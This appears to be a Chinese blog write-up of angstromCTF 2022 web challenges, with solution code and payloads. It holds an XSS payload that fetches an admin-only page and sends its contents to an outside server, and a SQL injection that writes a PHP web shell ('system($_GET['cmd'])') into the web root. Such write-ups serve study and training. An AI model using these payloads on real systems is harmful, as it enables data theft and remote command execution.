angstromctf复现

已于 2022-05-09 16:36:35 修改
阅读量534 收藏
点赞数
分类专栏: 比赛复现 文章标签: web安全 前端 安全
于 2022-05-08 19:31:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124648290
版权

目录

crumbs

由源码可以看出,只要知道curr在何值时键值为flag就可以了。

import requests
import re
url = "https://crumbs.web.actf.co/"
req = requests.get(url)
result = req.text[6:]
for i in range(1000):
    req = requests.get(url+result)
    result = req.text[6:]
    print(str(i)+" :"+result)

Xtra Salty Sardines

题目直接标出了是xss。
在这里插入图片描述
且告诉我们只有admin bot才能访问Xtra Salty Sardines下的flag。
在这里插入图片描述
且源码提示我们过滤了这些字符,但只匹配一次,所以我们只要在我们的xss脚本前加上&"'<>就行了。
在这里插入图片描述
在Xtra Salty Sardines页面传入xss,拿到https://xtra-salty-sardines.web.actf.co/sardines/jaumwaerhb地址
在这里插入图片描述

&"'<><script>fetch("https://xtra-salty-sardines.web.actf.co/flag").then(res => res.text()).then(text => fetch("https://xxx.xxx.xxxx.xxx/?s=" + text));</script>

最后在admin bot页面提交地址,就可以触发xss,以admin bot访问xtra-salty-sardines下的flag,并发到我们的服务器上,这边我用的burp collaborator client接收的。

在这里插入图片描述
得到flag
在这里插入图片描述

Art Gallery

暂没成功。

No Flags

dockfile

FROM php:8.1.5-apache-bullseye

# executable that prints the flag
COPY printflag /printflag
RUN chmod 111 /printflag
COPY src /var/www/html

RUN chown -R root:root /var/www/html && chmod -R 555 /var/www/html
RUN mkdir /var/www/html/abyss &&\
    chown -R root:root /var/www/html/abyss &&\
    chmod -R 333 abyss

EXPOSE 80

php


    <?php
        if (!isset($_SESSION["DBNAME"])) {
            $dbname = hash("sha256", (string) rand());
            $_SESSION["DBNAME"] = $dbname;
            $init = true;
        } else {
            $dbname = $_SESSION["DBNAME"];
            $init = false;
        }
        $pdo = new PDO("sqlite:/tmp/$dbname.db");
        if ($init) {
            $pdo->exec("CREATE TABLE Flags (flag string); INSERT INTO Flags VALUES ('actf{not_the_flag}'), ('actf{maybe_the_flag}')");
        }
        if (isset($_POST["flag"])) {
            $flag = $_POST["flag"];
            $pdo->exec("INSERT INTO Flags VALUES ('$flag');");
        }
        foreach ($pdo->query("SELECT * FROM Flags") as $row) {
            echo "<li>" . htmlspecialchars($row["flag"]) . "</li>";
        }
    ?>

从Dockfile中可以看出要运行printflag文件且给了我们/var/www/html/abyss的写入文件权限,那么我们就可以通过写入shell来执行printflag。

漏洞点在$pdo->exec("INSERT INTO Flags VALUES ('$flag');");

直接构造闭合然后创建我们的数据库即可。

'); ATTACH DATABASE '/var/www/html/abyss/succ3.php' AS succ3; CREATE TABLE succ3.pwn (dataz text); INSERT INTO succ3.pwn (dataz) VALUES ('<?php system($_GET["cmd"]); ?>'); -- succ3

');#闭合语句
ATTACH DATABASE '/var/www/html/abyss/succ3.php' AS succ3;#在succ3.php文件中创建一个数据库
CREATE TABLE succ3.pwn (dataz text);#创建一个表
INSERT INTO succ3.pwn (dataz) VALUES ('<?php system($_GET["cmd"]); ?>'); -- succ3#将shell写入我们创建的php中

在这里插入图片描述

参考:
wp

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
锐捷rce漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-16 981
​锐捷 rce,请求路径/guest_auth/guestIsUp.php //锐捷rce漏洞 锐捷rce漏洞文件
[angstromctf 2023] 部分
weixin_52640415的博客
04-30 798
这个比赛打了个开头就放弃了,最近放弃的比较多,国外的网太慢,国内的题太难。
20-VulnHub-Brainpan2
尼德霍格007
08-30 1287
20-VulnHub-Brainpan2 靶机地址: 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2020-7-16 一、信息收集 扫描目标主机 nmap -sP 192.168.21.0/24 扫描开放端口 nmap -A -p- 192.168.21.142 可以看到开放了9999和10000两个端口,前一个是abyss服务,后一个是http服务 先看一下熟悉的http服务 整个页面就一张图片,源码也没有有用信息 看一下9999端口,使用nc连接 nc 1
CTF基础知识
weixin_56947109的博客
04-22 3834
文章目录一、CTF简介二、竞赛三、比赛形式四、题目 一、CTF简介 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛
angstromctf -No libc for You
weixin_30439131的博客
05-29 73
0x00 syscall syscall函数原型为: int syscall(int number, ...) 其中number是系统调用号,number后面应顺序接上该系统调用的所有参数.大概意思是当调用syscall函数时,系统会去syscall调用表中寻找对应的系统函数,再把相应的参数赋给要调用的函数,然后执行该函数。例如:调用read函数syscall(0,0,buf,8) ...
angstromctf-2021-Write-ups
04-08
Angstromctf-2021-写起来 解决问题 加密货币 Relatively Simple Algorithm Keysar v2 sosig 二进位 Sanity Check tranquil stickystacks 网路 Jar
bug
yanhaijunyan的博客
09-19 1461
(1)仔细回忆bug出时细节(2)bug出之前有没有什么前提之类(3)比较难重可能是偶然性的缺陷,可以列为风险
phpcms的漏洞
https://www.cnblogs.com/zpchcbd/
09-26 3523
xxxxxxxxxxx
OPINIONDIGEST
07-27
OPINIONDIGEST
论文-深度补全算法
03-10
1、传统深度不全算法 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、代码可直接运行、包含有测试用例、以及验证代码
numpyxgboost算法内含数据集
10-16
numpyxgboost算法内含数据集
numpy实adaboost算法
10-16
Adaboost是一种迭代算法,其核心思想是针对同一个训练集训练不同的分类器(弱分类器),然后把这些弱分类器集合起来,构成一个更强的最终分类器(强分类器)。
CTF学习笔记——[HCTF 2018]admin
Obs_cure的博客
02-15 2610
一、[HCTF 2018]admin 1.题目 2.解题步骤 这个靶场还是很完整的,注册登陆一应俱全,还有留言板。注册和登陆部分尝试了一下,大部分我认知中的注入都被过滤了。于是老老实实注册了个账号。发里面有个留言板。这不就是师傅们经常攻击的地方吗~ 随便注入的两下没什么反应,看看源码呢~ 嗯?这个注释? 虽然能猜到这个是网站的源码,但由于没有网页的开发经验,所以很遗憾还是没看出什么门道~看WriteUp! 说实话看完之后有点被震撼到。跟着师傅们把三种做法都过一遍~ 这道题的突破口首先是github
HCIP-Datacom-ARST自选题库_02_网络安全【道题】
2301_80961833的博客
05-20 680
为了防止黑客通过MAC地址攻击用户设备或网络,可将非信任用户的MAC地址配置为黑洞MAC地址,过滤掉非法MAC地址。中间人攻击或IP/MAC Spoofing攻击都会导致信息泄露等危害,且在内网中比较常见,为了防止中间人攻击或IP/MACSpoofing攻击,可以采取以下哪些配置手段?多远题461/805、为了防止仿冒DHCP服务器接入网络,可以在交换机上开启DHCP Snooping功能,配置步骤包括以下哪些选项?开启DHCP Snooping检查DHCP REQUEST报文中CHADDR字段的功能。
CTF网络安全大赛简单web题目:eval
Pythonit教程网
05-17 891
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
出海战略中的网络技术应用:SOCKS5代理、代理IP与网络安全
最新发布
Together_GPT的博客
05-22 342
在全球市场中,SOCKS5代理、代理IP以及全面的网络安全措施,是跨界电商和游戏行业企业实成功出海的关键技术支柱。通过结合使用加密技术,如SSL/TLS,SOCKS5代理能够为数据传输提供一个安全的隧道,进一步增强数据的保密性和完整性。游戏企业则可以减少游戏延迟,提升玩家的游戏体验。同时,企业还可以根据不同地区的文化和语言特点,定制化地推送内容,提升用户的参与度和满意度。利用SOCKS5代理和代理IP,虽然可以在一定程度上增强安全性和隐私保护,但还需要更多的措施来构建全面的网络安全体系。
「 网络安全常用术语解读 」静态应用安全测试SAST详解
网络安全
05-20 768
静态应用安全测试 (SAST,Static Application Security Testing) 也称静态分析,是一种测试方法,通过分析源代码来发应用受到攻击的安全漏洞。SAST 在编译代码之前扫描应用,故又经常被称为白盒测试。
RXDNFuse
05-01
RXDNFuse技术需要具备一定的技术知识和实践经验。简单来说,RXDNFuse的过程包括以下几个步骤: 1. 寻找可注入的Windows系统进程; 2. 制作恶意DLL文件; 3. 利用工具或手动将恶意DLL注入到系统进程中; 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值